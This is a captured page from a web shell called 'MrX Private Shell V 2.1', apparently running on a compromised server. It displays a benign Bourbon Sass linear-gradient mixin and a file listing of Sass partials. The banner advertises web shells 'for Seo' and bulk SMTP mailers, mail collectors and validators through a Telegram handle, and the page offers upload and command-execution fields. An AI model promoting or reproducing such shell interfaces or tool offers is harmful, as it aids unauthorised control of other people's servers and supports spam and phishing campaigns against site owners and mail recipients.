__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
@mixin linear-gradient($pos, $g1, $g2: null,
                       $g3: null, $g4: null,
                       $g5: null, $g6: null,
                       $g7: null, $g8: null,
                       $g9: null, $g10: null,
                       $fallback: null) {
  @include _bourbon-deprecate-for-prefixing("linear-gradient");

  // Detect what type of value exists in $pos
  $pos-type: type-of(nth($pos, 1));
  $pos-spec: null;
  $pos-degree: null;

  // If $pos is missing from mixin, reassign vars and add default position
  @if ($pos-type == color) or (nth($pos, 1) == "transparent")  {
    $g10: $g9; $g9: $g8; $g8: $g7; $g7: $g6; $g6: $g5;
    $g5: $g4; $g4: $g3; $g3: $g2; $g2: $g1; $g1: $pos;
    $pos: null;
  }

  @if $pos {
    $positions: _linear-positions-parser($pos);
    $pos-degree: nth($positions, 1);
    $pos-spec:   nth($positions, 2);
  }

  $full: $g1, $g2, $g3, $g4, $g5, $g6, $g7, $g8, $g9, $g10;

  // Set $g1 as the default fallback color
  $fallback-color: nth($g1, 1);

  // If $fallback is a color use that color as the fallback color
  @if (type-of($fallback) == color) or ($fallback == "transparent") {
    $fallback-color: $fallback;
  }

  background-color: $fallback-color;
  background-image: -webkit-linear-gradient($pos-degree $full); // Safari 5.1+, Chrome
  background-image: unquote("linear-gradient(#{$pos-spec}#{$full})");
}

Filemanager

Name Type Size Permission Actions
_animation.scss File 2.06 KB 0664
_appearance.scss File 153 B 0664
_backface-visibility.scss File 181 B 0664
_background-image.scss File 1.37 KB 0664
_background.scss File 1.79 KB 0664
_border-image.scss File 1.79 KB 0664
_calc.scss File 163 B 0664
_columns.scss File 1.84 KB 0664
_filter.scss File 194 B 0664
_flex-box.scss File 8.71 KB 0664
_font-face.scss File 688 B 0664
_font-feature-settings.scss File 243 B 0664
_hidpi-media-query.scss File 518 B 0664
_hyphens.scss File 186 B 0664
_image-rendering.scss File 395 B 0664
_keyframes.scss File 1.19 KB 0664
_linear-gradient.scss File 1.34 KB 0664
_perspective.scss File 360 B 0664
_placeholder.scss File 248 B 0664
_radial-gradient.scss File 1.42 KB 0664
_selection.scss File 837 B 0664
_text-decoration.scss File 893 B 0664
_transform.scss File 691 B 0664
_transition.scss File 2.48 KB 0664
_user-select.scss File 160 B 0664
Filemanager